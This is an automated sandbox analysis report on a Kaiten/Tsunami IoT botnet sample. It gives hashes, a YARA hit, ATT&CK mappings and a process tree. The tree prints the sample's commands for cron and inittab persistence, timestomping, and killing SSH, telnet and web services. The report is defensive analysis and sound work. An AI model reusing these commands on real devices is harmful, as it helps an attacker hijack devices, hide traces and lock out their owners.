kaiten | 8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1

Analysis

max time kernel
47s
max time network
33s
platform
debian-12_mipsel
resource
debian12-mipsel-20240418-en
resource tags

arch:mipselimage:debian12-mipsel-20240418-enkernel:6.1.0-17-4kc-maltalocale:en-usos:debian-12-mipselsystem
submitted
23-10-2024 01:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf
Size

515KB
MD5

2ad737fb9e6ce08a164ddb8386f19b16
SHA1

86e87501edbdb8b6ee6ada9497ba2b62d741decc
SHA256

8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1
SHA512

068f4f7659c1d29ac0a6510e591100fba7fa1ffc445db21ce6487d77c8b34370fce3a24b4e9ff18b8910757123f593342dd80e473c0e337e7fa504eb3a13754f
SSDEEP

12288:v/J7M48SdpPK0RkLbZLn4nQdVV05tXqozEpwK9:HplxmLbJ4sY5tlzuv

Score

10^/10

kaiten botnet defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/747-1-0x00400000-0x005777e8-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.86dmNY crontab
Enumerates running processes
Discovers information about currently running processes on the system
Indicator Removal: Timestomp 1 TTPs 4 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
defense_evasion

Timestomp
T1070.006

Processes:

shtouchshtouch

pid process

753 sh
755 touch
795 sh
797 touch

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.86dmNY	crontab

pid	process
753	sh
755	touch
795	sh
797	touch

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

killallkillallkillallkillallkillallkillallkillallkillall

description	ioc	process
File opened for reading	/proc/27	killall
File opened for reading	/proc/34/stat	killall
File opened for reading	/proc/806	killall
File opened for reading	/proc/7	killall
File opened for reading	/proc/13	killall
File opened for reading	/proc/202/stat	killall
File opened for reading	/proc/714	killall
File opened for reading	/proc/30/stat	killall
File opened for reading	/proc/389	killall
File opened for reading	/proc/27	killall
File opened for reading	/proc/16/stat	killall
File opened for reading	/proc/186/stat	killall
File opened for reading	/proc/814/stat	killall
File opened for reading	/proc/827/stat	killall
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/820	killall
File opened for reading	/proc/47	killall
File opened for reading	/proc/1	killall
File opened for reading	/proc/26	killall
File opened for reading	/proc/844	killall
File opened for reading	/proc/20	killall
File opened for reading	/proc/379	killall
File opened for reading	/proc/426/stat	killall
File opened for reading	/proc/806/stat	killall
File opened for reading	/proc/830/stat	killall
File opened for reading	/proc/9	killall
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/698/stat	killall
File opened for reading	/proc/15	killall
File opened for reading	/proc/113	killall
File opened for reading	/proc/59/stat	killall
File opened for reading	/proc/59	killall
File opened for reading	/proc/668	killall
File opened for reading	/proc/42	killall
File opened for reading	/proc/714	killall
File opened for reading	/proc/179/stat	killall
File opened for reading	/proc/7/stat	killall
File opened for reading	/proc/30	killall
File opened for reading	/proc/804/stat	killall
File opened for reading	/proc/53	killall
File opened for reading	/proc/681/stat	killall
File opened for reading	/proc/696/stat	killall
File opened for reading	/proc/27	killall
File opened for reading	/proc/759/stat	killall
File opened for reading	/proc/393	killall
File opened for reading	/proc/740	killall
File opened for reading	/proc/30	killall
File opened for reading	/proc/380	killall
File opened for reading	/proc/721	killall
File opened for reading	/proc/411	killall
File opened for reading	/proc/740/stat	killall
File opened for reading	/proc/30	killall
File opened for reading	/proc/804/stat	killall
File opened for reading	/proc/37/stat	killall
File opened for reading	/proc/379/stat	killall
File opened for reading	/proc/1	killall
File opened for reading	/proc/410/stat	killall
File opened for reading	/proc/26	killall
File opened for reading	/proc/202	killall
File opened for reading	/proc/32	killall
File opened for reading	/proc/814/stat	killall
File opened for reading	/proc/696	killall
File opened for reading	/proc/15/stat	killall

/tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf
/tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf
1⤵
PID:747
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf"
  2⤵
  - Indicator Removal: Timestomp
  PID:753
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf
    3⤵
    - Indicator Removal: Timestomp
    PID:755
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
  2⤵
  PID:757
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:761
- - /usr/bin/grep
    grep -v /tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf
    3⤵
    PID:762
- - /usr/bin/grep
    grep -v "no cron"
    3⤵
    PID:763
- - /usr/bin/grep
    grep -v lesshts/run.sh
    3⤵
    PID:764
- /bin/sh
  sh -c "echo \"* * * * * /tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
  2⤵
  PID:769
- /bin/sh
  sh -c "crontab /var/run/.x00740882966"
  2⤵
  PID:772
- - /usr/bin/crontab
    crontab /var/run/.x00740882966
    3⤵
    - Creates/modifies Cron job
    PID:775
- /bin/sh
  sh -c "rm -rf /var/run/.x00740882966"
  2⤵
  PID:777
- - /usr/bin/rm
    rm -rf /var/run/.x00740882966
    3⤵
    PID:779
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf\" > /etc/inittab2"
  2⤵
  PID:781
- - /usr/bin/cat
    cat /etc/inittab
    3⤵
    PID:782
- - /usr/bin/grep
    grep -v /tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf
    3⤵
    PID:783
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/8e9cd77c31ba14b925208fa5e3d9f5675909f0a5ebc2399bdd9e36279314abd1.elf\" >> /etc/inittab2"
  2⤵
  PID:784
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:786
- - /usr/bin/cat
    cat /etc/inittab2
    3⤵
    PID:789
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:790
- - /usr/bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:793
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  - Indicator Removal: Timestomp
  PID:795
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    - Indicator Removal: Timestomp
    PID:797
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:800
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:801
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:803
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:807
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:808
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:809
- /bin/sh
  sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:810
- - /usr/bin/cat
    cat /var/run/httpd.pid
    3⤵
    PID:813
- /bin/sh
  sh -c "service httpd stop > /dev/null 2>&1 &"
  2⤵
  PID:812
- /bin/sh
  sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
  2⤵
  PID:815
- /bin/sh
  sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
  2⤵
  PID:817
- /bin/sh
  sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
  2⤵
  PID:819
- - /usr/bin/cat
    cat /var/run/thttpd.pid
    3⤵
    PID:823
- /bin/sh
  sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
  2⤵
  PID:822
- /bin/sh
  sh -c "nvram set http_enable=0 > /dev/null 2>&1"
  2⤵
  PID:824
- /bin/sh
  sh -c "killall -9 httpd > /dev/null 2>&1 &"
  2⤵
  PID:826
- /bin/sh
  sh -c "service telnetd stop > /dev/null 2>&1 &"
  2⤵
  PID:831
- /bin/sh
  sh -c "service sshd stop > /dev/null 2>&1 &"
  2⤵
  PID:833
- /bin/sh
  sh -c "killall -9 telnetd > /dev/null 2>&1 &"
  2⤵
  PID:837
- /bin/sh
  sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
  2⤵
  PID:841
- /bin/sh
  sh -c "killall -9 dropbear > /dev/null 2>&1 &"
  2⤵
  PID:845
- /bin/sh
  sh -c "killall -9 sshd > /dev/null 2>&1 &"
  2⤵
  PID:853
- /bin/sh
  sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
  2⤵
  PID:855

/usr/sbin/service
service httpd stop
1⤵
PID:814
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:821
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:825
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:830
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:828

/usr/bin/killall
killall -9 minihttpd
1⤵
- Reads runtime system information
PID:818

/usr/bin/killall
killall -9 mini_httpd
1⤵
- Reads runtime system information
PID:816

/usr/bin/killall
killall -9 httpd
1⤵
- Reads runtime system information
PID:829

/usr/sbin/service
service telnetd stop
1⤵
PID:832
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:838
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:842
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:849
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:851

/usr/sbin/service
service sshd stop
1⤵
PID:836
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:839
- /usr/bin/basename
  basename /usr/sbin/service
  2⤵
  PID:843
- /usr/bin/systemctl
  systemctl list-unit-files --full "--type=socket"
  2⤵
  PID:848
- /usr/bin/sed
  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
  2⤵
  PID:850

/usr/bin/killall
killall -9 telnetd
1⤵
- Reads runtime system information
PID:840

/usr/bin/killall
killall -9 utelnetd
1⤵
- Reads runtime system information
PID:844

/usr/bin/killall
killall -9 dropbear
1⤵
- Reads runtime system information
PID:852

/usr/bin/killall
killall -9 sshd
1⤵
- Reads runtime system information
PID:854

/usr/bin/killall
killall -9 lighttpd
1⤵
- Reads runtime system information
PID:856

/usr/local/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:814

/usr/local/bin/systemctl
systemctl stop httpd.service
1⤵
PID:814

/usr/sbin/systemctl
systemctl stop httpd.service
1⤵
PID:814

/usr/bin/systemctl
systemctl stop httpd.service
1⤵
PID:814

/usr/local/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:836

/usr/local/bin/systemctl
systemctl stop sshd.service
1⤵
PID:836

/usr/sbin/systemctl
systemctl stop sshd.service
1⤵
PID:836

/usr/bin/systemctl
systemctl stop sshd.service
1⤵
PID:836

/usr/local/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:832

/usr/local/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:832

/usr/sbin/systemctl
systemctl stop telnetd.service
1⤵
PID:832

/usr/bin/systemctl
systemctl stop telnetd.service
1⤵
PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Indicator Removal

T1070

Timestomp

T1070.006

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab2

Filesize
89B

MD5
ed9325576707c90f92f91a00018df6e1

SHA1
66b0c43f0a5fa8afb5b91cab54a881c758ee6617

SHA256
4545b1ca306caee15d18eed17776a0913a35f495a5667ff969f9b6bdeb71e798

SHA512
b959e227747b772bf5f91a83eaa2b2f1ffd0935249d96f65dff48ec90790a23257036afa44bb81ecf99f9308efbd9279a7b696403313d809e0645a2c326e8a3a

Download Submit
/run/.x00740882966

Filesize
103B

MD5
6ab55ecff77106ff23749db58f5507ca

SHA1
493ff266aa9f528acca3d4af6db710cd9507d53a

SHA256
8e18993cb8498b103a29e1eaec535eeb472a09d325d99ebdb9fe65217b6eafd3

SHA512
6ee6f11f24b3881e27c798e5daaca8a63f87eb2b8dc2a2417b06848c5178d0083793348840b2e413a1b81ffd22221b681a9bcb89005ae236163eff70a86a6a43

Download Submit
/var/spool/cron/crontabs/tmp.86dmNY

Filesize
299B

MD5
66cc1afc44f273f6afceaaaa359f8712

SHA1
fd90f906a48d49a29318748c9b9071168d5d7af7

SHA256
e51468cae16bd7e68514edfc01783e1a1c738ee93b148b257a544eadec845bd2

SHA512
15b937e458c7d84bf6e2fc6b69617048e650ab95634ac264009346116191595a5ab2dc0089a61ef37677704afd7af4c325147a7af51b8eb7a41ca3d2749d54f3

Download Submit
memory/747-1-0x00400000-0x005777e8-memory.dmp

Download